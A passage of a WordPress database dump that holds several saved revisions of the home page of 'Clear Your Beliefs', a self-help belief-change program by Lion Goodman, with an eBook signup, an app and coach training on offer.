'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 19:00:56', '2014-11-19 00:00:56', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1776, 2, '2014-11-18 19:01:46', '2014-11-19 00:01:46', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p><p> </p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 19:01:46', '2014-11-19 00:01:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1777, 2, '2014-11-18 19:17:07', '2014-11-19 00:17:07', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p><p> </p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 19:17:07', '2014-11-19 00:17:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1778, 2, '2014-11-18 19:37:59', '2014-11-19 00:37:59', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p><p> </p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 19:37:59', '2014-11-19 00:37:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1780, 2, '2014-11-18 19:52:17', '2014-11-19 00:52:17', '', 'favicon', '', 'inherit', 'closed', 'open', '', 'favicon', '', '', '2014-11-18 19:52:17', '2014-11-19 00:52:17', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/11/favicon.png', 0, 'attachment', 'image/png', 0),
(1782, 2, '2014-11-18 20:01:03', '2014-11-19 01:01:03', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p><p> </p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 20:01:03', '2014-11-19 01:01:03', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1783, 2, '2014-11-18 20:05:41', '2014-11-19 01:05:41', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p><p> </p>\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 20:05:41', '2014-11-19 01:05:41', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1784, 2, '2014-11-18 20:06:58', '2014-11-19 01:06:58', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p><p> </p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 20:06:58', '2014-11-19 01:06:58', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
